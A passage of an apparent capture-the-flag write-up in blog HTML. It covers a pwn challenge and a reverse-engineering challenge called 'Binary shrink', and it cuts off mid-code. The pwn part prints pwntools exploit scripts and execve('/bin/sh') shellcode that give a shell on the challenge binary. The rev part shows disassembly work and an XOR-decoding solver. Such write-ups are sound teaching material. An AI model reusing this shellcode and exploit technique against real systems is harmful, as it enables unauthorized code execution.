480w,\n/static/234e47122c5334b88746dca917d19fcb/b1f58/image-20240225153156591.webp 820w\"\n              sizes=\"(max-width: 820px) 100vw, 820px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/234e47122c5334b88746dca917d19fcb/8ff5a/image-20240225153156591.png 240w,\n/static/234e47122c5334b88746dca917d19fcb/e85cb/image-20240225153156591.png 480w,\n/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png 820w\"\n            sizes=\"(max-width: 820px) 100vw, 820px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png\"\n            alt=\"image-20240225153156591\"\n            title=\"image-20240225153156591\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To find the foothold for obtaining a shell, let’s think about what values are in the registers at the point when the system call is issued.</p>\n<p>Immediately after the system call returns, ecx should still hold the base address, and edx should still hold the length value set earlier.</p>\n<p>eax contains the return value of <code class=\"language-text\">read</code>, which is the size of the input in bytes.</p>\n<p>From this, issuing a <code class=\"language-text\">jmp ecx</code> instruction would jump to the start of the 0x18-byte region we overwrote, allowing us to chain into arbitrary code execution.</p>\n<p>To verify that the exploit actually works, let’s try running the following code.</p>\n<p>Here, we send an 18-byte shellcode <code class=\"language-text\">b'\\x90\\x90\\x90\\x90\\xb8\\x04\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xcd\\x80\\xff\\xe1'</code> to the program.</p>\n<p>We leave edx and ecx unchanged due to byte-size constraints, 
but the code uses the <code class=\"language-text\">sys_write</code> system call to output the data at the base address still stored in ecx to stdout.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># p = remote(\"0.cloud.chals.io\", 20922)</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./download.elf\"</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    nop\n    nop\n    nop\n    nop\n    mov eax, 4\n    mov ebx, 1\n    int 0x80\n    jmp ecx\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this script confirms that the byte data starting with NOPs is returned on stdout.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/1790f/image-20240225172502405.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 34.166666666666664%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVQoz1VQ7VLCQAy8p1H8eAKkXFtxBgFHaCtCP67g+7/Dms3lqvzIJNnb7Cbn2pc92sUeu6cSH8+l5ALbxxw7qTcPObbWb2Ye67sM6/sl3iVY32Sr3aU8ovc1QvGF6+qEy+u3xnUVM99v68j5eTtLnDAKxiDG7AbfIEaNIW9UvF0c0C8riVpjFDPmLqvQyRsz+SGPc5Fb4Tz/pKABtiWHacCegwknpgI0FfFpAa0b5XTZAS4oWGmTNmKfRLU38cRRMTMglt6Y3WCuJOh2ZpBO5hD/Jtg2am6GxMn/W0oEO19NJ4/FcRId/v0Pzwk2GM+P39D7evpLPVm4v+NyCoNkl1n9AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/8ac56/image-20240225172502405.webp 240w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/d3be9/image-20240225172502405.webp 480w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/e46b2/image-20240225172502405.webp 960w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/1671b/image-20240225172502405.webp 1189w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/8ff5a/image-20240225172502405.png 240w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/e85cb/image-20240225172502405.png 480w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/d9199/image-20240225172502405.png 960w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/1790f/image-20240225172502405.png 1189w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/d9199/image-20240225172502405.png\"\n            alt=\"image-20240225172502405\"\n            title=\"image-20240225172502405\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This confirms that arbitrary code execution via <code 
class=\"language-text\">jmp ecx</code> is possible.</p>\n<p>Finally, we obtain a shell using the following solver script.</p>\n<p>Here, we use a second <code class=\"language-text\">read</code> call to write up to 0x7f bytes into the region immediately following the <code class=\"language-text\">jmp ecx</code> instruction, chaining into shellcode execution to obtain a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># p = remote(\"0.cloud.chals.io\", 20922)</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./download.elf\"</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    nop\n    nop\n    nop\n    nop\n    nop\n    nop\n    nop\n    mov al, 0x3\n    add ecx,0x12\n    mov dl, 0x7f\n    int 0x80\n    jmp ecx\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># print(shellcraft.sh())</span>\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n    /* push b'/bin///sh\\x00' */\n    push 0x68\n    push 0x732f2f2f\n    push 0x6e69622f\n    mov ebx, esp\n    /* push argument array ['sh\\x00'] */\n    /* push 'sh\\x00\\x00' */\n    push 0x1010101\n    xor dword ptr [esp], 0x1016972\n    xor ecx, ecx\n    push ecx /* null terminate */\n    push 4\n    pop ecx\n    add ecx, esp\n    push ecx /* 'sh\\x00' */\n    mov ecx, esp\n    xor edx, edx\n    /* call execve() */\n    push SYS_execve /* 0xb */\n    
pop eax\n    int 0x80\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver retrieves the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 801px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA40lEQVQY012N206DUBBF0aitGm3ii30okUspGBBILLdSpEA5jWnF+NL4/z+yPKVp0viwMrNn9p5RMjthkwlE2iLCCuEJSruhmK6onLXs1+TmikRdkBsfcl6xtGoap+E7aGn0lHIyp9FS8ucAZWsVdG7NRl/QahnCzPicLWmlURgZxThg/jDriR5topFNPHJ4lzq8m+Jev/A20PFuNPyBgfIbb+nkp9PSuZjweqn21b06mA38oYl/ax7r0DgidSAJ760+e0L58Wr26Rf7ZMfOrai1hEqN6JyS+Mntw+eB//RHz/QfEud4BSOE9uQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/200ead58abbb7c9037b931df927eb867/8ac56/image-20240225172815610.webp 240w,\n/static/200ead58abbb7c9037b931df927eb867/d3be9/image-20240225172815610.webp 480w,\n/static/200ead58abbb7c9037b931df927eb867/99a1d/image-20240225172815610.webp 801w\"\n              sizes=\"(max-width: 801px) 100vw, 801px\"\n              
type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/200ead58abbb7c9037b931df927eb867/8ff5a/image-20240225172815610.png 240w,\n/static/200ead58abbb7c9037b931df927eb867/e85cb/image-20240225172815610.png 480w,\n/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png 801w\"\n            sizes=\"(max-width: 801px) 100vw, 801px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png\"\n            alt=\"image-20240225172815610\"\n            title=\"image-20240225172815610\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"binary-shrinkrev\" style=\"position:relative;\"><a href=\"#binary-shrinkrev\" aria-label=\"binary shrinkrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Binary shrink(Rev)</h2>\n<blockquote>\n<p>After hearing about young computer problems, you have decided to become a computer shrink. Your first patient is a robot elf.</p>\n<p>“A little machine dream I keep having, ” she says. “But when it is over, I always forget the end. I’ve captured the dream’s program, but I don’t dare look”.</p>\n<p>Can you run the program for her? 
Are you able to figure out what’s in her memory right before execution stops?</p>\n</blockquote>\n<p>Running the ELF file provided as the challenge binary simply printed the string <code class=\"language-text\">>:)</code> and exited.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 930px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 9.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhklEQVQI1y2LSw6CMABEuYEKrCSCGk0kxgKtfKRagr+FxrDS+9/kWdDFy5vMZBwjDT31sqCeNxwWPQa9atHrC2V4tFtDFZ3Qti+tH7s7nbjyqV68iyddcsMEijYscPJZigoEyt8i3YTMs1hLL0X6GdlE2PzvXDFYT3/nc1QO7EexZUM+jvkCBUw+VFukensAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/63ba31d54f9a1a85edf0aa969df7df43/8ac56/image-20240225173104444.webp 240w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/d3be9/image-20240225173104444.webp 480w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/6eb96/image-20240225173104444.webp 930w\"\n              sizes=\"(max-width: 930px) 100vw, 930px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/63ba31d54f9a1a85edf0aa969df7df43/8ff5a/image-20240225173104444.png 240w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/e85cb/image-20240225173104444.png 480w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png 930w\"\n            sizes=\"(max-width: 930px) 100vw, 930px\"\n            type=\"image/png\"\n          />\n          <img\n            
class=\"gatsby-resp-image-image\"\n            src=\"/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png\"\n            alt=\"image-20240225173104444\"\n            title=\"image-20240225173104444\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the problem statement, it seems the flag is written into memory during program execution.</p>\n<p>I initially thought gdb would handle this easily, but just like the previous challenge, this binary uses Tiny ELF techniques, so gdb could not analyze it properly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 837px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7aaccd16670fa2c540287d57d820e6b8/8ac56/image-20240225173321665.webp 240w,\n/static/7aaccd16670fa2c540287d57d820e6b8/d3be9/image-20240225173321665.webp 480w,\n/static/7aaccd16670fa2c540287d57d820e6b8/a6125/image-20240225173321665.webp 837w\"\n              sizes=\"(max-width: 837px) 100vw, 837px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7aaccd16670fa2c540287d57d820e6b8/8ff5a/image-20240225173321665.png 240w,\n/static/7aaccd16670fa2c540287d57d820e6b8/e85cb/image-20240225173321665.png 
480w,\n/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png 837w\"\n            sizes=\"(max-width: 837px) 100vw, 837px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png\"\n            alt=\"image-20240225173321665\"\n            title=\"image-20240225173321665\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The entry point is at 0x8048009.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbe061122be11488a66d9438bc57270c/b6e34/image-20240225173630827.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbe061122be11488a66d9438bc57270c/8ac56/image-20240225173630827.webp 240w,\n/static/bbe061122be11488a66d9438bc57270c/d3be9/image-20240225173630827.webp 480w,\n/static/bbe061122be11488a66d9438bc57270c/e46b2/image-20240225173630827.webp 960w,\n/static/bbe061122be11488a66d9438bc57270c/33ecb/image-20240225173630827.webp 1103w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbe061122be11488a66d9438bc57270c/8ff5a/image-20240225173630827.png 
240w,\n/static/bbe061122be11488a66d9438bc57270c/e85cb/image-20240225173630827.png 480w,\n/static/bbe061122be11488a66d9438bc57270c/d9199/image-20240225173630827.png 960w,\n/static/bbe061122be11488a66d9438bc57270c/b6e34/image-20240225173630827.png 1103w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbe061122be11488a66d9438bc57270c/d9199/image-20240225173630827.png\"\n            alt=\"image-20240225173630827\"\n            title=\"image-20240225173630827\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since neither a decompiler nor <code class=\"language-text\">objdump</code> could extract the correct code as-is, I first stripped the header with <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=9</code> and then obtained the assembly via <code class=\"language-text\">objdump -D -Mintel,x86-64 -b binary -m i386 outdata</code>.</p>\n<p>It appears the binary begins by calling the address at offset 58 (0x31+9) of the original file, but the subsequent processing is not disassembled correctly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0c971463728c232bff6464b0cbfb5c3c/187fa/image-20240225180035936.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 29.583333333333332%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCUlEQVQY042QX1OCQBTFedJ01NIaS5tqACWUhV1QCAQy8U/iaL000/f/JKe7S8/lw2/u3Xt3zz13tcSYI7h3EQ0ForsQ0SCE6AmwjgNXwcDaU8yuPRSPEdJbgXwY4O0hpJwjG/iqtqLeos+hZX2BpMfw0nWQyQuE3zTB6zr4hQHRqJC5W9Ph1SlST+JRzav/1mrVWSsnS+zGKbbmQk2bdWwE7WeEVxPML22I5gh+a6ziOWjS9sFeYm/lJGSpiRsjQUm1r/CAT77F6ilSjuQD3jD/Foy6UxxZgXcSVCsQu1GKD2+jBL/jk/qfoGWd5zCnNUv7FUenqByS4FqPK1G3Ej2xNeIb9193kh8ARK8c34W6pgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0c971463728c232bff6464b0cbfb5c3c/8ac56/image-20240225180035936.webp 240w,\n/static/0c971463728c232bff6464b0cbfb5c3c/d3be9/image-20240225180035936.webp 480w,\n/static/0c971463728c232bff6464b0cbfb5c3c/e46b2/image-20240225180035936.webp 960w,\n/static/0c971463728c232bff6464b0cbfb5c3c/de1dc/image-20240225180035936.webp 1194w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0c971463728c232bff6464b0cbfb5c3c/8ff5a/image-20240225180035936.png 240w,\n/static/0c971463728c232bff6464b0cbfb5c3c/e85cb/image-20240225180035936.png 480w,\n/static/0c971463728c232bff6464b0cbfb5c3c/d9199/image-20240225180035936.png 960w,\n/static/0c971463728c232bff6464b0cbfb5c3c/187fa/image-20240225180035936.png 1194w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0c971463728c232bff6464b0cbfb5c3c/d9199/image-20240225180035936.png\"\n            alt=\"image-20240225180035936\"\n            title=\"image-20240225180035936\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Next, I extract and analyze the 
data starting at byte 58 (0x31+9) using <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=58</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d4c7db6e7274fb38370d08b06c539867/7798c/image-20240225180121067.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5ElEQVQY042PS1PCMBCAe1IU8YHjo1XUClSxrzTSFG0LBR3R0WE8ePDi//8Zn010HI89fLNJdvfbjXXfT0lOAlJboGxF5ijEfkKwHRD+EnR8ZDdifqaYOreUjqTqpeRHgtnp2ER9r3pjrPwgRu2MmHR9ymNBfhgj2wPilotoXSI2+oa4PofrriH6iz9v0b+c9erPWXqlmaD2bkh3R8iOh9zySNpDYi3T0s1BI6yi3urNXxhhuHZhpi3OM56vpiyHhRFrdHETsZXVX30XTxR2YlbWTQ/uhJfrGV/VB593K1bhY2PhN9FCkFh13em+AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d4c7db6e7274fb38370d08b06c539867/8ac56/image-20240225180121067.webp 240w,\n/static/d4c7db6e7274fb38370d08b06c539867/d3be9/image-20240225180121067.webp 480w,\n/static/d4c7db6e7274fb38370d08b06c539867/e46b2/image-20240225180121067.webp 960w,\n/static/d4c7db6e7274fb38370d08b06c539867/62502/image-20240225180121067.webp 1183w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d4c7db6e7274fb38370d08b06c539867/8ff5a/image-20240225180121067.png 240w,\n/static/d4c7db6e7274fb38370d08b06c539867/e85cb/image-20240225180121067.png 480w,\n/static/d4c7db6e7274fb38370d08b06c539867/d9199/image-20240225180121067.png 
960w,\n/static/d4c7db6e7274fb38370d08b06c539867/7798c/image-20240225180121067.png 1183w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d4c7db6e7274fb38370d08b06c539867/d9199/image-20240225180121067.png\"\n            alt=\"image-20240225180121067\"\n            title=\"image-20240225180121067\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It appears the code pops the return address that the call at the entry point left on the stack top (the address of the next instruction after the entry point) into rdx, copies rdx into rax, and then jumps to address 0x78 (0x3e+58).</p>\n<p>Using the same approach, I disassemble the next block of code extracted with <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=120</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1c3bab040f9b1ddb479e20556250f684/60b3a/image-20240225180248116.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1c3bab040f9b1ddb479e20556250f684/8ac56/image-20240225180248116.webp 240w,\n/static/1c3bab040f9b1ddb479e20556250f684/d3be9/image-20240225180248116.webp 480w,\n/static/1c3bab040f9b1ddb479e20556250f684/e46b2/image-20240225180248116.webp 
960w,\n/static/1c3bab040f9b1ddb479e20556250f684/58f5f/image-20240225180248116.webp 1179w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1c3bab040f9b1ddb479e20556250f684/8ff5a/image-20240225180248116.png 240w,\n/static/1c3bab040f9b1ddb479e20556250f684/e85cb/image-20240225180248116.png 480w,\n/static/1c3bab040f9b1ddb479e20556250f684/d9199/image-20240225180248116.png 960w,\n/static/1c3bab040f9b1ddb479e20556250f684/60b3a/image-20240225180248116.png 1179w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1c3bab040f9b1ddb479e20556250f684/d9199/image-20240225180248116.png\"\n            alt=\"image-20240225180248116\"\n            title=\"image-20240225180248116\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After performing several operations, it appears to loop through an XOR operation.</p>\n<p>The following is a reconstruction of the entire code sequence so far (not actual buildable code).</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">section <span class=\"token punctuation\">.</span>text\nglobal _start\n\nfirst<span class=\"token operator\">:</span>\n    pop    rdx\n    mov    rax<span class=\"token punctuation\">,</span>rdx\n    jmp    second\n\nsecond<span class=\"token operator\">:</span>\n    add    rdx<span class=\"token punctuation\">,</span><span class=\"token number\">0x91</span>\n    sub    rax<span class=\"token punctuation\">,</span><span class=\"token number\">0xe</span>\n    mov    rsi<span class=\"token punctuation\">,</span>rax\n    xor    ecx<span class=\"token 
punctuation\">,</span>ecx\n    mov    cl<span class=\"token punctuation\">,</span><span class=\"token number\">0x56</span>\n    mov    rax<span class=\"token punctuation\">,</span>rsi\npoint<span class=\"token operator\">:</span>\n    mov    sil<span class=\"token punctuation\">,</span>BYTE PTR <span class=\"token punctuation\">[</span>rax<span class=\"token punctuation\">]</span>\n    xor    BYTE PTR <span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>sil\n    xor    QWORD PTR <span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x42</span>\n    inc    rdx\n    inc    rax\n    loop   point\n\n_start<span class=\"token operator\">:</span>\n    call first</code></pre></div>\n<p>Both rax and rdx should hold the return address that was on the stack top — that is, the next instruction address after the entry point.</p>\n<p>Therefore, <code class=\"language-text\">sub rax,0xe</code> stores the image base address in rax, and <code class=\"language-text\">add rdx,0x91</code> stores the address <code class=\"language-text\">image base + 0xe + 0x91</code> in rdx.</p>\n<p>In the loop, rax and rdx are incremented together, and for each of 0x56 iterations, the byte at the address in rdx is XORed with the byte at the address in rax, and then XORed with 0x42. (The second XOR is encoded as a QWORD operation, but its immediate 0x42 sign-extends to a value whose only non-zero bits are in the lowest byte, so it still changes only the byte at rdx; this is why a byte-wise solver is sufficient.)</p>\n<p>I wrote the following solver to perform this binary manipulation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"binary_shrink\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span 
class=\"token punctuation\">:</span>\n    data <span class=\"token operator\">=</span> <span class=\"token builtin\">bytearray</span><span class=\"token punctuation\">(</span>f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">bytearray</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span> <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\nrax <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\nrdx <span class=\"token operator\">=</span> <span class=\"token number\">0xe</span> <span class=\"token operator\">+</span> <span class=\"token number\">0x91</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span 